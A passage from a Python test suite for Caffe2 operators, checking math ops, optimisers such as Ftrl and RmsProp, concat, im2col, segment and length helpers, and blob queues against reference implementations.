_test_binary_broadcast("Mul", ref)(self)
def test_div(self):
def ref(x, y):
return (x / y, )
def non_zero(x):
return abs(x) > 10e-5
def div_dtypes():
return st.sampled_from([np.float32, np.float64])
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=True,
dtypes=div_dtypes, gcs=hu.gcs_cpu_only
)(self)
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=False,
dtypes=div_dtypes
)(self)
_test_binary_broadcast(
"Div", ref, filter_=non_zero, dtypes=div_dtypes)(self)
@given(X=hu.tensor(), in_place=st.booleans(), **hu.gcs)
def test_negative(self, X, in_place, gc, dc):
op = core.CreateOperator("Negative", ["X"],
["Y" if not in_place else "X"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_tanh(self, X, gc, dc):
op = core.CreateOperator("Tanh", "X", "Y")
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_averaged_loss(self, X, gc, dc):
op = core.CreateOperator("AveragedLoss", ["X"], ["loss"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), inplace=st.booleans(), **hu.gcs)
def test_softsign(self, X, inplace, gc, dc):
op = core.CreateOperator("Softsign", ["X"], ["X" if inplace else "Y"])
def softsign(X):
return (X / (1 + np.abs(X)),)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertReferenceChecks(gc, op, [X], softsign)
if inplace:
with self.assertRaises(Exception):
self.assertGradientChecks(gc, op, [X], 0, [0])
else:
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(
device_options=st.lists(
min_size=2,
max_size=4,
elements=st.sampled_from(hu.expanded_device_options)),
set_seed=st.booleans())
def test_random_seed_behaviour(self, device_options, set_seed):
# Assume we are always operating on CUDA or CPU, since RNG is
# inconsistent between CPU and GPU.
device_options = copy.deepcopy(device_options)
assume(len({do.device_type for do in device_options}) == 1)
if set_seed:
for do in device_options:
do.random_seed = 1000
def run(do):
# Reset each time because 'Y' may already exist in the workspace
# on a different device
workspace.ResetWorkspace()
ws = workspace.C.Workspace()
op = core.CreateOperator(
"XavierFill", [], ["Y"],
device_option=do,
shape=[2])
ws.run(op)
return ws.blobs["Y"].fetch()
ys = [run(do) for do in device_options]
for y in ys[1:]:
if set_seed:
np.testing.assert_array_equal(ys[0], y)
else:
with self.assertRaises(AssertionError):
np.testing.assert_array_equal(ys[0], y)
@given(axis=st.integers(min_value=1, max_value=4),
num_output=st.integers(min_value=4, max_value=8),
engine=st.sampled_from(["", "PACKED"]),
**hu.gcs)
def test_fully_connected_axis(self, axis, num_output, engine, gc, dc):
np.random.seed(1)
X = np.random.randn(1, 2, 3, 2, 1).astype(np.float32)
def prod(xs):
p = 1
for x in xs:
p *= x
return p
K = prod(list(X.shape)[axis:])
N = num_output
W = np.random.randn(N, K).astype(np.float32)
b = np.random.randn(N).astype(np.float32)
op = core.CreateOperator(
"FC",
["X", "W", "b"],
["Y"],
engine=engine,
axis=axis)
for name, param in [("X", X), ("W", W), ("b", b)]:
self.ws.create_blob(name).feed(param)
self.ws.run(op)
Y = self.ws.blobs["Y"].fetch()
self.assertEqual(list(Y.shape), list(X.shape)[:axis] + [N])
inputs = [X, W, b]
self.assertDeviceChecks(dc, op, inputs, [0])
for param, _ in enumerate(inputs):
self.assertGradientChecks(gc, op, inputs, param, [0])
@unittest.skipIf(not workspace.has_gpu_support,
"Skipping test due to no gpu present.")
@given(hidden_size=st.integers(min_value=1, max_value=3),
num_layers=st.integers(min_value=1, max_value=3),
bidirectional=st.just(False), # TODO
rnn_mode=st.sampled_from(["lstm"]), # TODO: "gru"
input_mode=st.sampled_from(["linear"]),
dropout=st.floats(min_value=1.0, max_value=1.0),
T=st.integers(min_value=2, max_value=6),
N=st.integers(min_value=1, max_value=4),
D=st.integers(min_value=1, max_value=4))
def test_recurrent(self, hidden_size, num_layers, bidirectional, rnn_mode,
input_mode, dropout, T, N, D):
# Random seed, this one happens to pass
seed = 1234
np.random.seed(seed)
input_weight_size = hidden_size * D
upper_layer_input_weight_size = hidden_size * hidden_size
recurrent_weight_size = hidden_size * hidden_size
input_bias_size = hidden_size
recurrent_bias_size = hidden_size
num_directions = 2 if bidirectional else 1
first_layer_sz = input_weight_size + recurrent_weight_size + \
input_bias_size + recurrent_bias_size
upper_layer_sz = upper_layer_input_weight_size + \
recurrent_weight_size + input_bias_size + \
recurrent_bias_size
total_sz = 4 * (first_layer_sz + (num_layers - 1) * upper_layer_sz)
total_sz *= num_directions
W = np.random.rand(total_sz).astype(np.float32)
self.ws.create_blob("WEIGHT").feed(W, device_option=hu.gpu_do)
op = core.CreateOperator(
"Recurrent",
["INPUT", "HIDDEN_INPUT", "CELL_INPUT", "WEIGHT"],
["OUTPUT", "HIDDEN_OUTPUT", "CELL_OUTPUT",
"RNN_SCRATCH", "DROPOUT_STATES"],
hidden_size=hidden_size,
bidirectional=bidirectional,
rnn_mode=rnn_mode,
dropout=dropout,
input_mode=input_mode,
num_layers=num_layers,
seed=seed,
engine="CUDNN")
X = np.random.randn(T, N, D).astype(np.float32)
self.ws.create_blob("INPUT").feed(X, device_option=hu.gpu_do)
W = self.ws.blobs["WEIGHT"].fetch()
H = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32)
C = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32) if rnn_mode == "lstm" else \
np.empty((1,)).astype(np.float32) # unused in GRU
inputs = [X, H, C, W]
input_idxs = [i for (i, _) in enumerate(inputs)] \
if rnn_mode == "lstm" else [0, 1, 3] # ignore C
for input_idx in input_idxs:
self.assertGradientChecks(
hu.gpu_do, op, inputs, input_idx, [0],
stepsize=0.01, threshold=0.01)
@given(ndim=st.integers(1, 4),
axis=st.integers(0, 3),
add_axis=st.integers(0, 1),
num_inputs=st.integers(2, 4), **hu.gcs)
def test_depth_concat(self, ndim, axis, add_axis, num_inputs, gc, dc):
assume(axis < ndim)
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7][:ndim]
individual_dims = [1, 2, 3, 4, 5][:num_inputs]
inputs = []
for i in range(num_inputs):
if add_axis == 0:
# Set a unique dim and create the input.
shape[axis] = individual_dims[i]
inputs.append(np.random.randn(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
axis=axis, add_axis=add_axis)
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
def depth_concat(*inputs):
inputs = list(inputs)
if add_axis:
for i in range(len(inputs)):
inputs[i] = np.expand_dims(inputs[i], axis)
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat)
@given(num_inputs=st.integers(2, 4),
order=st.sampled_from([("NCHW", 1), ("NHWC", 3)]),
**hu.gcs)
def test_depth_concat_with_order(self, num_inputs, order, gc, dc):
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7]
individual_dims = [1, 2, 3, 4][:num_inputs]
inputs = []
for i in range(num_inputs):
# Set a unique dim and create the input.
shape[order[1]] = individual_dims[i]
inputs.append(np.random.rand(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
order=order[0])
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
def depth_concat_with_order(*inputs):
inputs = list(inputs)
axis = order[1]
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat_with_order)
@given(X=hu.arrays(dims=[5, 2],
elements=st.floats(min_value=0.0, max_value=10.0)),
**hu.gcs_cpu_only)
def test_last_n_windows(self, X, gc, dc):
workspace.FeedBlob('input', X)
workspace.FeedBlob('next', np.array(0, dtype=np.int32))
workspace.CreateBlob('output')
collect_net = core.Net('collect_net')
collect_net.LastNWindowCollector(
['output', 'next', 'input'],
['output', 'next'],
num_to_collect=7,
)
plan = core.Plan('collect_data')
plan.AddStep(core.execution_step('collect_data',
[collect_net], num_iter=2))
workspace.RunPlan(plan)
output = workspace.FetchBlob('output')
inputs = workspace.FetchBlob('input')
new_output = np.zeros([7, inputs.shape[1]])
for i in range(inputs.shape[0] * 2):
new_output[i % 7] = inputs[i % inputs.shape[0]]
import numpy.testing as npt
npt.assert_almost_equal(output, new_output, decimal=5)
@given(batch_size=st.integers(1, 3),
stride=st.integers(1, 3),
pad=st.integers(0, 3),
kernel=st.integers(1, 5),
dilation=st.integers(1, 3),
size=st.integers(7, 10),
channels=st.integers(1, 8),
**hu.gcs)
def test_im2col_layout(self, batch_size, stride, pad, kernel, dilation,
size, channels, gc, dc):
dkernel = (dilation * (kernel - 1) + 1)
assume(size >= dkernel)
NCHW_TO_NHWC = (0, 2, 3, 1)
NHWC_TO_NCHW = (0, 3, 1, 2)
COL_NHWC_TO_NCHW = (4, 2, 3, 0, 1)
N = batch_size
C = channels
H = size
W = size
out_h = int((H + (2 * pad) - dkernel) / stride + 1)
out_w = int((W + (2 * pad) - dkernel) / stride + 1)
im_nchw = np.random.rand(N, C, H, W).astype(np.float32) - 0.5
im_nhwc = im_nchw.transpose(NCHW_TO_NHWC)
op_im2col_nchw = core.CreateOperator(
"Im2Col",
["im_nchw"], ["col_nchw"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order="NCHW",
device_option=gc)
op_im2col_nhwc = core.CreateOperator(
"Im2Col",
["im_nhwc"], ["col_nhwc"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order="NHWC",
device_option=gc)
self.ws.create_blob("im_nchw").feed(im_nchw, device_option=gc)
self.ws.create_blob("im_nhwc").feed(im_nhwc, device_option=gc)
self.ws.run(op_im2col_nchw)
self.ws.run(op_im2col_nhwc)
# there is probably a clever way to spell this in np
col_nchw = self.ws.blobs["col_nchw"].fetch()
col_nhwc = self.ws.blobs["col_nhwc"].fetch()
col_nchw_ = col_nchw.reshape(N, C, kernel, kernel, out_h, out_w)
col_nhwc_ = col_nhwc.reshape(N, out_h, out_w, kernel, kernel, C)
for i in range(0, N):
np.testing.assert_allclose(
col_nchw_[i],
col_nhwc_[i].transpose(COL_NHWC_TO_NCHW),
atol=1e-4,
rtol=1e-4)
op_col2im_nchw = core.CreateOperator(
"Col2Im",
["col_nchw", "im_nchw"],
["out_nchw"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order="NCHW",
device_option=gc)
op_col2im_nhwc = core.CreateOperator(
"Col2Im",
["col_nhwc", "im_nhwc"],
["out_nhwc"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order="NHWC",
device_option=gc)
self.ws.run(op_col2im_nchw)
self.ws.run(op_col2im_nhwc)
out_nchw = self.ws.blobs["out_nchw"].fetch()
out_nhwc = self.ws.blobs["out_nhwc"].fetch()
np.testing.assert_allclose(
out_nchw,
out_nhwc.transpose(NHWC_TO_NCHW),
atol=1e-4,
rtol=1e-4)
@given(dtype=st.sampled_from([np.float32, np.float64, np.int32, np.bool]))
def test_print(self, dtype):
data = np.random.permutation(6).astype(dtype)
self.ws.create_blob("data").feed(data)
op = core.CreateOperator("Print", "data", [])
self.ws.run(op)
@given(inputs=hu.tensors(n=2),
in_place=st.booleans(),
momentum=st.floats(min_value=0.1, max_value=0.9),
nesterov=st.booleans(),
lr=st.floats(min_value=0.1, max_value=0.9),
**hu.gcs)
def test_momentum_sgd(
self, inputs, in_place, momentum, nesterov, lr, gc, dc):
grad, m = inputs
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"MomentumSGD",
["grad", "m", "lr"],
["grad" if in_place else "grad_o",
"m" if in_place else "m_o"],
momentum=momentum,
nesterov=int(nesterov),
device_option=gc)
self.assertDeviceChecks(
dc, op, [grad, m, lr], [0])
# Reference
def momentum_sgd(grad, m, lr):
lr = lr[0]
if not nesterov:
adjusted_gradient = lr * grad + momentum * m
return (adjusted_gradient, adjusted_gradient)
else:
m_new = momentum * m + lr * grad
return ((1 + momentum) * m_new - momentum * m, m_new)
self.assertReferenceChecks(gc, op, [grad, m, lr], momentum_sgd)
@given(inputs=hu.tensors(n=3),
in_place=st.booleans(),
decay=st.floats(min_value=0.1, max_value=0.9),
momentum=st.floats(min_value=0.1, max_value=0.9),
lr=st.floats(min_value=0.1, max_value=0.9),
epsilon=st.floats(min_value=1e-5, max_value=1e-2),
**hu.gcs)
def test_rmsprop_sgd(self, inputs, in_place, decay, momentum, lr, epsilon,
gc, dc):
grad, ms, mom = inputs
ms = np.abs(ms) + 0.01
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"RmsProp",
["grad", "ms", "mom", "lr"],
["grad" if in_place else "grad_o",
"ms" if in_place else "ms_o",
"mom" if in_place else "mom_o"],
momentum=momentum, decay=decay, epsilon=epsilon, device_option=gc)
self.assertDeviceChecks(dc, op, [grad, ms, mom, lr], [0])
def rmsprop(grad, ms, mom, lr):
lr = lr[0]
ms_o = ms + (1. - decay) * (np.square(grad) - ms)
mom_o = momentum * mom + lr * grad / np.sqrt(epsilon + ms_o)
grad_o = mom_o
return (grad_o, ms_o, mom_o)
self.assertReferenceChecks(gc, op, [grad, ms, mom, lr], rmsprop)
# Reference
@staticmethod
def _dense_ftrl(alpha, beta, lambda1, lambda2, w, nz, g):
if isinstance(alpha, np.ndarray):
alpha = np.asscalar(alpha)
n = np.take(nz, 0, axis=-1)
z = np.take(nz, 1, axis=-1)
# python port of Sigrid's implementation
g2 = g * g
sigma = (np.sqrt(n + g2) - np.sqrt(n)) / alpha
z += g - sigma * w
n += g2
w = (np.sign(z) * lambda1 - z) / (
(beta + np.sqrt(n)) / alpha + lambda2)
w[np.abs(z) <= lambda1] = 0
return (w, np.stack([n, z], axis=-1))
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd(self, inputs, in_place, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad],
partial(self._dense_ftrl, alpha, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd(self, inputs, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad"],
["var", "nz"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad], [0])
# Reference
def ftrl(w, nz, i, g):
sw, snz = self._dense_ftrl(alpha, beta, lambda1, lambda2,
w[i], nz[i], g)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad], ftrl)
# Reference
@staticmethod
def _dense_ftrl_send_alpha_by_input(beta, lambda1, lambda2, w, nz, g, alpha):
return TestOperators._dense_ftrl(alpha, beta, lambda1, lambda2, w, nz,
g)
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd_send_alpha_by_input(self, inputs, in_place, alpha, beta,
lambda1, lambda2, engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad", "alpha"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad, alpha], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad, alpha],
partial(self._dense_ftrl_send_alpha_by_input, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd_send_alpha_by_input(self, inputs, alpha, beta,
lambda1, lambda2, engine, gc,
dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad", "alpha"],
["var", "nz"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad, alpha], [0])
# Reference
def ftrl(w, nz, i, g, alpha):
sw, snz = self._dense_ftrl_send_alpha_by_input(beta, lambda1,
lambda2, w[i], nz[i],
g, alpha)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad, alpha],
ftrl)
@given(input=hu.tensor(max_value=20,
max_dim=1,
dtype=np.int32,
elements=st.integers(min_value=0, max_value=10)),
with_remapping=st.booleans(),
**hu.gcs)
def test_unique(self, input, with_remapping, gc, dc):
op = core.CreateOperator(
"Unique",
["input"],
["unique"] + (["remapping"] if with_remapping else []),
device_option=gc)
self.assertDeviceChecks(dc, op, [input], [0])
# Validator
def unique_valid(input, unique, remapping=None):
self.assertEqual(unique.size, len(set(input)))
self.assertEqual(sorted(unique), sorted(set(input)))
if with_remapping:
self.assertEqual(remapping.shape, input.shape)
remapped = [unique[remapping[i]] for i in range(len(input))]
np.testing.assert_array_equal(remapped, input)
self.assertValidationChecks(gc, op, [input], unique_valid)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
top_k=st.integers(min_value=1, max_value=3),
**hu.gcs)
def test_accuracy(self, prediction, labels, top_k, gc, dc):
if top_k > 1:
gc = hu.cpu_do
op = core.CreateOperator(
"Accuracy",
["prediction", "labels"],
["accuracy"],
top_k=top_k,
device_option=gc
)
def op_ref(prediction, labels, top_k):
N = prediction.shape[0]
correct = 0
for i in range(0, len(prediction)):
pred_sorted = sorted(
([item, j] for j, item in enumerate(prediction[i])),
key=lambda x: x[0],
reverse=True
)
max_ids = [x[1] for x in pred_sorted[0:top_k]]
for m in max_ids:
if m == labels[i]:
correct += 1
accuracy = correct / N
return (accuracy,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels, top_k],
reference=op_ref)
@given(target_probabilities=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0.01,
max_value=1)),
**hu.gcs)
def test_perplexity(self, target_probabilities, gc, dc):
op = core.CreateOperator(
"Perplexity",
["target_probabilities"],
["perplexity"]
)
def op_ref(target_probabilities):
N = target_probabilities.shape[0]
perplexities = np.power(target_probabilities, -1.0 / N)
perplexity = reduce(lambda x, y: x * y, perplexities)
return (perplexity,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[target_probabilities],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_segment_ids(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToSegmentIds",
["lengths"],
["segment_ids"])
def op_ref(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_range_fill(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsRangeFill",
["lengths"],
["increasing_seq"])
def op_ref(lengths):
sids = []
for _, l in enumerate(lengths):
sids.extend(list(range(l)))
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(**hu.gcs_cpu_only)
def test_segment_ids_to_ranges(self, gc, dc):
lengths = [4, 6, 3, 2, 0, 4]
op = core.CreateOperator(
"SegmentIdsToRanges",
["segment_ids"],
["ranges"])
def op_ref(segment_ids):
ranges = [np.array([0, 0], dtype=np.int32)]
prev = 0
for i, sid in enumerate(segment_ids):
while sid != prev:
prev += 1
ranges.append(np.array([i, 0], dtype=np.int32))
ranges[-1][1] += 1
return (np.array(ranges, dtype=np.int32), )
def lengths_to_segment_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=np.array(lengths_to_segment_ids(lengths), dtype=np.int32),
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_ranges(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToRanges",
["lengths"],
["ranges"])
def op_ref(x):
if not x.size:
return (x.reshape((0, 2)), )
return (np.column_stack((np.concatenate(([0], np.cumsum(x)[:-1])),
x)), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
**hu.gcs)
def test_multi_class_accuracy(self, prediction, labels, gc, dc):
op = core.CreateOperator(
"MultiClassAccuracy",
["prediction", "labels"],
["accuracies", "amounts"]
)
def op_ref(prediction, labels):
N = prediction.shape[0]
D = prediction.shape[1]
accuracies = np.empty(D, dtype=float)
accuracies.fill(0)
amounts = np.empty(D, dtype=int)
amounts.fill(0)
max_ids = np.argmax(prediction, axis=1)
for i in range(0, N):
max_id = max_ids[i]
label_id = labels[i]
if max_id == label_id:
accuracies[label_id] += 1
amounts[label_id] += 1
for i in range(0, D):
amount = amounts[i]
if amount:
accuracies[i] /= amount
return (accuracies, amounts,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_segment_ids_to_lengths(self, lengths, gc, dc):
op = core.CreateOperator(
"SegmentIdsToLengths",
["segment_ids"],
["lengths"])
def lengths_to_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return sids
segment_ids = lengths_to_ids(lengths)
def ids_to_lengths(ids):
ids_length = len(ids)
if ids_length == 0:
return (np.array([], dtype=np.int32),)
lengths = []
# segment id starts with 0
prev_id = -1
tmp_length = 0
for idx in range(ids_length):
cur_id = ids[idx]
if cur_id != prev_id:
if idx != 0:
lengths.append(tmp_length)
while prev_id + 1 != cur_id:
lengths.append(0)
prev_id += 1
prev_id = cur_id
tmp_length = 0
tmp_length += 1
lengths.append(tmp_length)
return (np.array(lengths, dtype=np.int32),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(segment_ids, dtype=np.int32)],
reference=ids_to_lengths)
@given(lengths=st.lists(st.integers(min_value=1, max_value=10),
min_size=0,
max_size=10),
power=st.sampled_from([0.5, 1.0, 1.5, 2.0]),
**hu.gcs_cpu_only)
def test_lengths_to_weights(self, lengths, power, gc, dc):
op = core.CreateOperator(
"LengthsToWeights",
["lengths"],
["weights"],
power=power)
def lengths_to_weights(lengths):
weighted_length = []
for l in lengths:
weighted_length.extend(l * [1 / pow(l, power)])
return (np.array(weighted_length, dtype=float),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=lengths_to_weights)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_abs(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Abs",
["input"],
["output"]
)
def abs_ref(input_tensor):
return (np.abs(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=abs_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_cos(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Cos",
["input"],
["output"]
)
def cos_ref(input_tensor):
return (np.cos(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=cos_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_sin(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Sin",
["input"],
["output"]
)
def sin_ref(input_tensor):
return (np.sin(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=sin_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_exp(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Exp",
["input"],
["output"]
)
def exp_ref(input_tensor):
return (np.exp(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=exp_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=1,
max_value=10000)),
**hu.gcs_cpu_only)
def test_log(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Log",
["input"],
["output"]
)
def log_ref(input_tensor):
return (np.log(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=log_ref)
self.assertGradientChecks(gc, op, [input_tensor], 0, [0])
def test_blobs_dequeue_timeout(self):
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=5,
num_blobs=1)
self.ws.run(op)
t = time.time()
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
["out"],
timeout_secs=0.2)
self.assertRaises(RuntimeError, lambda: self.ws.run(op))
t = time.time() - t
self.assertGreater(t, 0.19)
@given(num_threads=st.integers(1, 10), # noqa
num_elements=st.integers(1, 100),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_blobs_queue_threading(self, num_threads, num_elements,
capacity, num_blobs, do):
"""
- Construct matrices of size N x D
- Start K threads
- Push all N rows into the queue of capacity C
- Pull all N rows out of the queue.
- Verify that the output matrices are permutation of the rows of the
original matrices.
"""
import threading
try:
import queue
except ImportError:
# Python 2 fallback: the stdlib module is named Queue there
import Queue as queue
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=capacity,
num_blobs=num_blobs,
device_option=do)
self.ws.run(op)
xs = [np.random.randn(num_elements, 5).astype(np.float32)
for _ in range(num_blobs)]
q = queue.Queue()
for i in range(num_elements):
q.put([x[i] for x in xs])
def enqueue(t):
while True:
feed_blobs = ["x_{}_{}".format(i, t) for i in range(num_blobs)]
op = core.CreateOperator(
"EnqueueBlobs",
["queue"] + feed_blobs,
feed_blobs,
device_option=do)
try:
elems = q.get_nowait()
for elem, feed_blob in zip(elems, feed_blobs):
self.ws.create_blob(feed_blob).feed(
elem, device_option=do)
self.ws.run(op)
except queue.Empty:
return
# Create all blobs before racing on multiple threads
# (blob creation is not threadsafe)
for t in range(num_threads):
for i in range(num_blobs):
self.ws.create_blob("x_{}_{}".format(i, t))
threads = [threading.Thread(target=enqueue, args=(t,))
for t in range(num_threads)]
for thread in threads:
thread.start()
for n in range(num_elements):
dequeue_blobs = ["y_{}_{}".format(i, n) for i in range(num_blobs)]
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
dequeue_blobs,
device_option=do)
self.ws.run(op)
for thread in threads:
thread.join()
op = core.CreateOperator("CloseBlobsQueue", ["queue"], [])
self.ws.run(op)
